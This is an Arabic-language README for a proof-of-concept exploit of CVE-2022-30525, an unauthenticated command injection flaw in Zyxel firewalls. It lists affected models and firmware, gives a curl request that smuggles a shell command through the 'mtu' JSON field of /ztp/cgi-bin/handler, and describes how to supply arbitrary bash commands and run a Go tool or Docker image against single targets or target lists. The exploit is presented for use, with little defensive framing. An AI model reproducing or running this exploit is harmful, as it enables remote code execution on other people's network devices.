
POC أولي لـ CVE-2022-30525
Rapid7 اكتشفت وأبلغت عن ثغرة تؤثر على جدران Zyxel النارية التي تدعم التوفير الصفري (ZTP)، والتي تشمل سلسلة ATP، وسلسلة VPN، وسلسلة USG FLEX (بما في ذلك USG20-VPN وUSG20W-VPN). تسمح الثغرة، المعروفة باسم CVE-2022-30525، لمهاجم غير مصادق وعن بعد بتنفيذ تعليمات برمجية عشوائية كمستخدم nobody على الجهاز المتأثر.
الجدول التالي يحتوي على الطرازات المتأثرة وإصدارات البرامج الثابتة.
الطراز المتأثر USG FLEX 100, 100W, 200, 500, 700 ZLD5.00 حتى ZLD5.21 التصحيح 1 USG20-VPN, USG20W-VPN ZLD5.10 حتى ZLD5.21 التصحيح 1 ATP 100, 200, 500, 700, 800 ZLD5.10 حتى ZLD5.21 التصحيح 1
سلسلة VPN، التي تدعم أيضًا ZTP، ليست عرضة للخطر لأنها لا تدعم الوظيفة المطلوبة.
الطرازات المتأثرة عرضة لحقن الأوامر عن بعد بدون مصادقة عبر واجهة HTTP الإدارية. يتم تنفيذ الأوامر كمستخدم nobody. يتم استغلال هذه الثغرة عبر المسار /ztp/cgi-bin/handler.
curl -v --insecure -X POST -H "Content-Type: application/json" -d
'{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
:"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
https://192.168.1.1/ztp/cgi-bin/handler
يجب إنشاء ملف cmds حيث يمكنك إضافة الأوامر التي سيتم تنفيذها عبر البرنامج بالتنسيق التالي:
bash -c "command#1 && command#2 && etc."
For example:
bash -c "ping 8.8.8.8"
Golang
1. git clone https://github.com/iveresk/cve-2022-30525.git
2. cd cve-2022-30525
3. go build cve-2022-30525.go -o /cve-2022-30525
4. chmod +x cve-2022-30525
5. ./cve-2022-30525 -t <targetURL> [or <targetFile>]
Dockerfile
docker run -it -e INPUT_FILE=<file_name> masterrooot/cve-30525
حيث INPUT_FILE هو عنوان URL مستهدف أو ملف يحتوي على قائمة بالأهداف.
يمكنك التواصل معي بحرية عبر Keybase لأي تفاصيل.